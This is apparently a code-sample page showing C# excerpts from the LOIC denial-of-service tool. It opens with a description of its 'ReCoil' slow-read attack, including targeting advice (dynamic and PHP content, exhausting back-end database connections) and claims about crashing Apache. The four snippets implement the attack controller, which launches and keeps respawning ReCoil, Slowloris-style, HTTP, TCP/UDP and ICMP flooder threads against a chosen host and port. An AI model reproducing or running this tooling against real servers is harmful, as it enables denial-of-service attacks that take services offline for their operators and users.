ReCoil basically does a "reverse" DDOS Requirements: the targeted "file" has to be larger than 24 KB (bigger IS better ;) !)
it sends a complete legimit request but throttles the download down to nearly nothing .. just enough to keep the connection alive the attack-method is basically the same as slowloris ... bind the socket as long as possible and eat up as much as you can apache servers crash nearly in an instant. this attack however can NOT be mitigated with http-ready and mods like that. this attack simulates sth like a massive amount of mobile devices running shortly out of coverage (like driving through a tunnel) due to the nature of the congestian-response this could maybe taken a step further to self-feeding congestion-cascades if done "properly" in a distributed manner together with packet-floods.(??) Limitations / Disadvantages: this does NOT work if you are behind anything like a proxy / caching-stuff. in this implementation however we are bound to the underlying system-/net-buffers ... due to that the required size of the targeted file differs -.- Dataflow: {NET} --> {WINSOCK-Buffer} --> ClientSocket .. so we have to make sure the actual data exceeds the winsock-buffer + clientsocket-buffer, but we can ONLY change the latter. from what i could find on a brief search / test the winsock buffer for a 10/100 links lies around 16-18KB where 1 GBit links have an underlying buffer around 64KB (size really does matter :P ) what to target?: although it might makes sense to target pictures or other large files on the server this doesn't really makes sense! the server could (and in most cases does - except for apache) always read directly from the file-stream resulting in nearly 0 needed RAM --> always target dynamic content! this has to be generated on the fly / pulled fom a DB and therefor most likely ends up in the RAM! high-value targets / worst case szenario: as it seems the echo statement in php writes directly to the socket .. considering this it should be possible to take down the back-end infrastructure if the page does an early flush causing the congestation while still holding DB-conns etc.
Inheritance: cHLDos
Beispiel #1
0
        /// <summary>
        /// Attack the specified target
        /// </summary>
        /// <param name="toggle">Whether to toggle.</param>
        /// <param name="on">Whether the attack should start.</param>
        /// <param name="silent">Whether to silence error output.</param>
        private void Attack(bool toggle, bool on, bool silent = false)
        {
            if ((cmdAttack.Text == AttackText && toggle) || (!toggle && on))
            {
                try
                {
                    // Protect against race condition
                    if (tShowStats.Enabled)
                    {
                        tShowStats.Stop();
                    }

                    if (!Functions.ParseInt(txtPort.Text, 0, 65535, out iPort))
                    {
                        HandleError("Invalid port.", silent);
                        return;
                    }
                    if (!Functions.ParseInt(txtThreads.Text, 1, (bKonami ? 1337 : 99), out iThreads))
                    {
                        HandleError("Too many threads!  Lower than 100, please.", silent);
                        return;
                    }

                    sTargetIP = txtTarget.Text;
                    if (String.IsNullOrEmpty(sTargetIP) || String.IsNullOrEmpty(sTargetHost) || String.Equals(sTargetIP, "N O N E !"))
                    {
                        throw new Exception("Select a target.");
                    }

                    sMethod  = cbMethod.Text;
                    protocol = Protocol.None;
                    try {
                        protocol = (Protocol)Enum.Parse(typeof(Protocol), sMethod, true);
                        // Analysis disable once EmptyGeneralCatchClause
                    } catch { }
                    if (protocol == Protocol.None)
                    {
                        HandleError("Select a proper attack method.", silent);
                        return;
                    }

                    sData = txtData.Text.Replace(@"\r", "\r").Replace(@"\n", "\n");
                    if (String.IsNullOrEmpty(sData) && (protocol == Protocol.TCP || protocol == Protocol.UDP))
                    {
                        HandleError("No contents specified.", silent);
                        return;
                    }

                    sSubsite = txtSubsite.Text;
                    if (!sSubsite.StartsWith("/") && (int)protocol >= (int)Protocol.HTTP && (int)protocol != (int)Protocol.ICMP)
                    {
                        HandleError("You have to enter a subsite (for example \"/\")", silent);
                        return;
                    }

                    if (!int.TryParse(txtTimeout.Text, out iTimeout) || iTimeout < 1)
                    {
                        HandleError("Invalid number in timeout box.", silent);
                        return;
                    }
                    if (iTimeout > 999)
                    {
                        iTimeout        = 30;
                        txtTimeout.Text = "30";
                    }

                    bResp = chkWaitReply.Checked;

                    if (protocol == Protocol.slowLOIC || protocol == Protocol.ReCoil || protocol == Protocol.ICMP)
                    {
                        if (!int.TryParse(txtSLSpT.Text, out iSockspThread) || iSockspThread < 1)
                        {
                            throw new Exception("Please enter a number.");
                        }
                    }
                }
                catch (Exception ex)
                {
                    HandleError(ex.Message, silent);
                    return;
                }

                cmdAttack.Text = StpFldText;
                //let's lock down the controls, that could actually change the creation of new sockets
                chkAllowGzip.Enabled = false;
                chkUseGet.Enabled    = false;
                chkMsgRandom.Enabled = false;
                chkRandom.Enabled    = false;
                cbMethod.Enabled     = false;
                chkWaitReply.Enabled = false;
                txtSLSpT.Enabled     = false;

                if (arr.Count > 0)
                {
                    foreach (IFlooder i in arr)
                    {
                        i.Stop();
                        i.IsFlooding = false;
                    }
                    arr.Clear();
                }

                for (int i = 0; i < iThreads; i++)
                {
                    IFlooder ts = null;

                    switch (protocol)
                    {
                    case Protocol.ReCoil:
                        ts = new ReCoil(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, bResp, iSockspThread, chkAllowGzip.Checked);
                        break;

                    case Protocol.slowLOIC:
                        ts = new SlowLoic(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, iSockspThread, true, chkUseGet.Checked, chkAllowGzip.Checked);
                        break;

                    case Protocol.HTTP:
                        ts = new HTTPFlooder(sTargetHost, sTargetIP, iPort, sSubsite, bResp, iDelay, iTimeout, chkRandom.Checked, chkUseGet.Checked, chkAllowGzip.Checked);
                        break;

                    case Protocol.TCP:
                    case Protocol.UDP:
                        ts = new XXPFlooder(sTargetIP, iPort, (int)protocol, iDelay, bResp, sData, chkMsgRandom.Checked);
                        break;

                    case Protocol.ICMP:
                        ts = new ICMP(sTargetIP, iDelay, chkMsgRandom.Checked, iSockspThread);
                        break;
                    }

                    if (ts != null)
                    {
                        ts.Start();
                        arr.Add(ts);
                    }
                }

                tShowStats.Start();
            }
            else if (toggle || !on)
            {
                cmdAttack.Text       = AttackText;
                chkAllowGzip.Enabled = true;
                chkUseGet.Enabled    = true;
                chkMsgRandom.Enabled = true;
                chkRandom.Enabled    = true;
                cbMethod.Enabled     = true;
                chkWaitReply.Enabled = true;
                txtSLSpT.Enabled     = true;

                if (arr != null && arr.Count > 0)
                {
                    foreach (IFlooder i in arr)
                    {
                        i.Stop();
                        i.IsFlooding = false;
                    }
                }
            }
        }
Beispiel #2
0
        /// <summary>
        /// Handles the tShowStats Tick event.
        /// </summary>
        /// <param name="sender">Sender.</param>
        /// <param name="e">EventArgs.</param>
        private void tShowStats_Tick(object sender, EventArgs e)
        {
            // Protect against null reference and race condition
            if(arr == null || intShowStats)
                return;

            intShowStats = true;

            int iIdle = 0;
            int iConnecting = 0, iRequesting = 0, iDownloading = 0;
            int iDownloaded = 0, iRequested = 0, iFailed = 0;

            bool isFlooding = false;
            if (cmdAttack.Text == StpFldText)
                isFlooding = true;

            if(arr.Count > 0)
            {
                for (int a = (arr.Count - 1); a >= 0; a--)
                {
                    if(arr[a] != null && (arr[a] is cHLDos))
                    {
                        cHLDos c = (cHLDos)arr[a];

                        iDownloaded += c.Downloaded;
                        iRequested += c.Requested;
                        iFailed += c.Failed;
                        if(c.State == ReqState.Ready ||
                            c.State == ReqState.Completed)
                            iIdle++;
                        if (c.State == ReqState.Connecting)
                            iConnecting++;
                        if (c.State == ReqState.Requesting)
                            iRequesting++;
                        if (c.State == ReqState.Downloading)
                            iDownloading++;

                        if (isFlooding && !c.IsFlooding)
                        {
                            cHLDos ts = null;

                            int iaDownloaded = c.Downloaded;
                            int iaRequested = c.Requested;
                            int iaFailed = c.Failed;

                            if (protocol == Protocol.ReCoil)
                            {
                                ts = new ReCoil(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, bResp, iSockspThread, chkAllowGzip.Checked);
                            }
                            if (protocol == Protocol.slowLOIC)
                            {
                                ts = new SlowLoic(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, iSockspThread, true, chkUseGet.Checked, chkAllowGzip.Checked);
                            }
                            if (protocol == Protocol.HTTP)
                            {
                                ts = new HTTPFlooder(sTargetHost, sTargetIP, iPort, sSubsite, bResp, iDelay, iTimeout, chkRandom.Checked, chkUseGet.Checked, chkAllowGzip.Checked);
                            }
                            if (protocol == Protocol.TCP || protocol == Protocol.UDP)
                            {
                                ts = new XXPFlooder(sTargetIP, iPort, (int)protocol, iDelay, bResp, sData, chkMsgRandom.Checked);
                            }

                            if(ts != null)
                            {
                                arr[a].Stop();
                                arr[a].IsFlooding = false;

                                arr.RemoveAt(a);

                                ts.Downloaded = iaDownloaded;
                                ts.Requested = iaRequested;
                                ts.Failed = iaFailed;
                                ts.Start();

                                arr.Add(ts);
                            }
                        }
                    }
                }
                if (isFlooding)
                {
                    while (arr.Count < iThreads)
                    {
                        IFlooder ts = null;

                        if (protocol == Protocol.ReCoil)
                        {
                            ts = new ReCoil(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, bResp, iSockspThread, chkAllowGzip.Checked);
                        }
                        if (protocol == Protocol.slowLOIC)
                        {
                            ts = new SlowLoic(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, iSockspThread, true, chkUseGet.Checked, chkAllowGzip.Checked);
                        }
                        if (protocol == Protocol.HTTP)
                        {
                            ts = new HTTPFlooder(sTargetHost, sTargetIP, iPort, sSubsite, bResp, iDelay, iTimeout, chkRandom.Checked, chkUseGet.Checked, chkAllowGzip.Checked);
                        }
                        if (protocol == Protocol.TCP || protocol == Protocol.UDP)
                        {
                            ts = new XXPFlooder(sTargetIP, iPort, (int)protocol, iDelay, bResp, sData, chkMsgRandom.Checked);
                        }

                        if(ts != null)
                        {
                            ts.Start();
                            arr.Add(ts);
                        }
                        else break;
                    }
                    if (arr.Count > iThreads)
                    {
                        for (int a = (arr.Count - 1); a >= iThreads; a--)
                        {
                            arr[a].Stop();
                            arr[a].IsFlooding = false;

                            arr.RemoveAt(a);
                        }
                    }
                }
            }

            lbFailed.Text = iFailed.ToString();
            lbRequested.Text = iRequested.ToString();
            lbDownloaded.Text = iDownloaded.ToString();
            lbDownloading.Text = iDownloading.ToString();
            lbRequesting.Text = iRequesting.ToString();
            lbConnecting.Text = iConnecting.ToString();
            lbIdle.Text = iIdle.ToString();

            intShowStats = false;
        }
Beispiel #3
0
        /// <summary>
        /// Handles the tShowStats Tick event.
        /// </summary>
        /// <param name="sender">Sender.</param>
        /// <param name="e">EventArgs.</param>
        private void tShowStats_Tick(object sender, EventArgs e)
        {
            // Protect against null reference and race condition
            if (arr == null || intShowStats)
            {
                return;
            }

            intShowStats = true;

            int iIdle = 0;
            int iConnecting = 0, iRequesting = 0, iDownloading = 0;
            int iDownloaded = 0, iRequested = 0, iFailed = 0;

            bool isFlooding = false;

            if (cmdAttack.Text == StpFldText)
            {
                isFlooding = true;
            }

            if (arr.Count > 0)
            {
                for (int a = (arr.Count - 1); a >= 0; a--)
                {
                    if (arr[a] != null && (arr[a] is cHLDos))
                    {
                        cHLDos c = arr[a] as cHLDos;

                        iDownloaded += c.Downloaded;
                        iRequested  += c.Requested;
                        iFailed     += c.Failed;
                        if (c.State == ReqState.Ready ||
                            c.State == ReqState.Completed)
                        {
                            iIdle++;
                        }
                        if (c.State == ReqState.Connecting)
                        {
                            iConnecting++;
                        }
                        if (c.State == ReqState.Requesting)
                        {
                            iRequesting++;
                        }
                        if (c.State == ReqState.Downloading)
                        {
                            iDownloading++;
                        }

                        if (isFlooding && !c.IsFlooding)
                        {
                            cHLDos ts = null;

                            int iaDownloaded = c.Downloaded;
                            int iaRequested  = c.Requested;
                            int iaFailed     = c.Failed;

                            if (protocol == Protocol.ReCoil)
                            {
                                ts = new ReCoil(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, bResp, iSockspThread, chkAllowGzip.Checked);
                            }
                            if (protocol == Protocol.slowLOIC)
                            {
                                ts = new SlowLoic(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, iSockspThread, true, chkUseGet.Checked, chkAllowGzip.Checked);
                            }
                            if (protocol == Protocol.HTTP)
                            {
                                ts = new HTTPFlooder(sTargetHost, sTargetIP, iPort, sSubsite, bResp, iDelay, iTimeout, chkRandom.Checked, chkUseGet.Checked, chkAllowGzip.Checked);
                            }
                            if (protocol == Protocol.TCP || protocol == Protocol.UDP)
                            {
                                ts = new XXPFlooder(sTargetIP, iPort, (int)protocol, iDelay, bResp, sData, chkMsgRandom.Checked);
                            }
                            if (protocol == Protocol.ICMP)
                            {
                                ts = new ICMP(sTargetIP, iDelay, chkMsgRandom.Checked, iSockspThread);
                            }

                            if (ts != null)
                            {
                                arr[a].Stop();
                                arr[a].IsFlooding = false;

                                arr.RemoveAt(a);

                                ts.Downloaded = iaDownloaded;
                                ts.Requested  = iaRequested;
                                ts.Failed     = iaFailed;
                                ts.Start();

                                arr.Add(ts);
                            }
                        }
                    }
                }
                if (isFlooding)
                {
                    while (arr.Count < iThreads)
                    {
                        IFlooder ts = null;

                        if (protocol == Protocol.ReCoil)
                        {
                            ts = new ReCoil(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, bResp, iSockspThread, chkAllowGzip.Checked);
                        }
                        if (protocol == Protocol.slowLOIC)
                        {
                            ts = new SlowLoic(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, iSockspThread, true, chkUseGet.Checked, chkAllowGzip.Checked);
                        }
                        if (protocol == Protocol.HTTP)
                        {
                            ts = new HTTPFlooder(sTargetHost, sTargetIP, iPort, sSubsite, bResp, iDelay, iTimeout, chkRandom.Checked, chkUseGet.Checked, chkAllowGzip.Checked);
                        }
                        if (protocol == Protocol.TCP || protocol == Protocol.UDP)
                        {
                            ts = new XXPFlooder(sTargetIP, iPort, (int)protocol, iDelay, bResp, sData, chkMsgRandom.Checked);
                        }
                        if (protocol == Protocol.ICMP)
                        {
                            ts = new ICMP(sTargetIP, iDelay, chkMsgRandom.Checked, iSockspThread);
                        }

                        if (ts != null)
                        {
                            ts.Start();
                            arr.Add(ts);
                        }
                        else
                        {
                            break;
                        }
                    }
                    if (arr.Count > iThreads)
                    {
                        for (int a = (arr.Count - 1); a >= iThreads; a--)
                        {
                            arr[a].Stop();
                            arr[a].IsFlooding = false;

                            arr.RemoveAt(a);
                        }
                    }
                }
            }

            lbFailed.Text      = iFailed.ToString();
            lbRequested.Text   = iRequested.ToString();
            lbDownloaded.Text  = iDownloaded.ToString();
            lbDownloading.Text = iDownloading.ToString();
            lbRequesting.Text  = iRequesting.ToString();
            lbConnecting.Text  = iConnecting.ToString();
            lbIdle.Text        = iIdle.ToString();

            intShowStats = false;
        }
Beispiel #4
0
        /// <summary>
        /// Attack the specified target
        /// </summary>
        /// <param name="toggle">Whether to toggle.</param>
        /// <param name="on">Whether the attack should start.</param>
        /// <param name="silent">Whether to silence error output.</param>
        private void Attack(bool toggle, bool on, bool silent = false)
        {
            if((cmdAttack.Text == AttackText && toggle) || (!toggle && on))
            {
                try
                {
                    // Protect against race condition
                    if(tShowStats.Enabled) tShowStats.Stop();

                    if (!Functions.ParseInt(txtPort.Text, 0, 65535, out iPort)) {
                        Wtf ("I don't think ports are supposed to be written like THAT.", silent);
                        return;
                    }

                    if (!Functions.ParseInt(txtThreads.Text, 1, 99, out iThreads)) {
                        Wtf ("What on earth made you put THAT in the threads field?", silent);
                        return;
                    }

                    sTargetIP = txtTarget.Text;
                    if (String.IsNullOrEmpty(sTargetIP) || String.IsNullOrEmpty(sTargetHost) || String.Equals(sTargetIP, "N O N E !"))
                        throw new Exception("Select a target.");

                    sMethod = cbMethod.Text;
                    protocol = Protocol.None;
                    try {
                        protocol = (Protocol) Enum.Parse (typeof (Protocol), sMethod, true);
                        // Analysis disable once EmptyGeneralCatchClause
                    } catch { }
                    if(protocol == Protocol.None) {
                        Wtf ("Select a proper attack method.", silent);
                        return;
                    }

                    sData = txtData.Text.Replace(@"\r", "\r").Replace(@"\n", "\n");
                    if(String.IsNullOrEmpty(sData) && (protocol == Protocol.TCP || protocol == Protocol.UDP)) {
                        Wtf ("Gonna spam with no contents? You're a wise fellow, aren't ya? o.O", silent);
                        return;
                    }

                    sSubsite = txtSubsite.Text;
                    if (!sSubsite.StartsWith ("/") && ((int)protocol >= (int)Protocol.HTTP)) {
                        Wtf ("You have to enter a subsite (for example \"/\")", silent);
                        return;
                    }

                    if (!int.TryParse (txtTimeout.Text, out iTimeout) || iTimeout < 1) {
                        Wtf ("What's up with something like that in the timeout box? =S", silent);
                        return;
                    }
                    if (iTimeout > 999)
                    {
                        iTimeout = 30;
                        txtTimeout.Text = "30";
                    }

                    bResp = chkWaitReply.Checked;

                    if (protocol == Protocol.slowLOIC || protocol == Protocol.ReCoil)
                    {
                        if (!int.TryParse(txtSLSpT.Text, out iSockspThread) || iSockspThread < 1)
                            throw new Exception("A number is fine too!");
                    }
                }
                catch (Exception ex)
                {
                    Wtf (ex.Message, silent);
                    return;
                }

                cmdAttack.Text = StpFldText;
                //let's lock down the controls, that could actually change the creation of new sockets
                chkAllowGzip.Enabled = false;
                chkUseGet.Enabled = false;
                chkMsgRandom.Enabled = false;
                chkRandom.Enabled = false;
                cbMethod.Enabled = false;
                chkWaitReply.Enabled = false;
                txtSLSpT.Enabled = false;

                if (arr.Count > 0)
                {
                    foreach (IFlooder i in arr)
                    {
                        i.Stop();
                        i.IsFlooding = false;
                    }
                    arr.Clear();
                }

                for (int i = 0; i < iThreads; i++)
                {
                    IFlooder ts = null;

                    if (protocol == Protocol.ReCoil)
                    {
                        ts = new ReCoil(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, bResp, iSockspThread, chkAllowGzip.Checked);
                    }
                    if (protocol == Protocol.slowLOIC)
                    {
                        ts = new SlowLoic(sTargetHost, sTargetIP, iPort, sSubsite, iDelay, iTimeout, chkRandom.Checked, iSockspThread, true, chkUseGet.Checked, chkAllowGzip.Checked);
                    }
                    if (protocol == Protocol.HTTP)
                    {
                        ts = new HTTPFlooder(sTargetHost, sTargetIP, iPort, sSubsite, bResp, iDelay, iTimeout, chkRandom.Checked, chkUseGet.Checked, chkAllowGzip.Checked);
                    }
                    if (protocol == Protocol.TCP || protocol == Protocol.UDP)
                    {
                        ts = new XXPFlooder(sTargetIP, iPort, (int)protocol, iDelay, bResp, sData, chkMsgRandom.Checked);
                    }

                    if(ts != null)
                    {
                        ts.Start();
                        arr.Add(ts);
                    }
                }

                tShowStats.Start();
            }
            else if(toggle || !on)
            {
                cmdAttack.Text = AttackText;
                chkAllowGzip.Enabled = true;
                chkUseGet.Enabled = true;
                chkMsgRandom.Enabled = true;
                chkRandom.Enabled = true;
                cbMethod.Enabled = true;
                chkWaitReply.Enabled = true;
                txtSLSpT.Enabled = true;

                if (arr != null && arr.Count > 0)
                {
                    foreach (IFlooder i in arr)
                    {
                        i.Stop();
                        i.IsFlooding = false;
                    }
                }
            }
        }